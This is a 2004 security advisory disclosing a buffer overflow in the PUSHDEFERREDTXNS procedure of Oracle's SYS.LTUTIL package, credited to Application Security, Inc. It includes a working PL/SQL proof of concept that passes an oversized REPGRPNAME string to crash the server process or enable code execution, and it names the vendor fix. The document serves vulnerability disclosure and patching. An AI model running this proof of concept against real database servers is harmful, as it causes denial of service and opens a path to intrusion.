|
#40 - Buffer overflow in procedure PUSHDEFERREDTXNS of LTUTIL package
August 31, 2004
Credit: These vulnerabilities were researched and discovered by Esteban Martínez Fayó of Application Security, Inc.
Risk level: Low
Details:
When PUSHDEFERREDTXNS procedure is called with a long string in the REPGRPNAME parameter a buffer overflow occurs.
To reproduce the overflow, execute the next PL/SQL:
DECLARE
P_REPGRPNAME VARCHAR2(32767);
AAA VARCHAR2(32767);
BEGIN
AAA:='A';
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA || AAA;
P_REPGRPNAME := AAA;
SYS.LTUTIL.PUSHDEFERREDTXNS(REPGRPNAME => P_REPGRPNAME);
END;
Analysis:
This vulnerability can be exploited by members of WMSYS or SYSDBA role and users granted execute permissions on LTUTIL package.
Exploitation of this vulnerability allows an attacker to execute arbitrary code. It can also be exploited to cause DOS (Denial of service) killing Oracle server process.
Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.
|
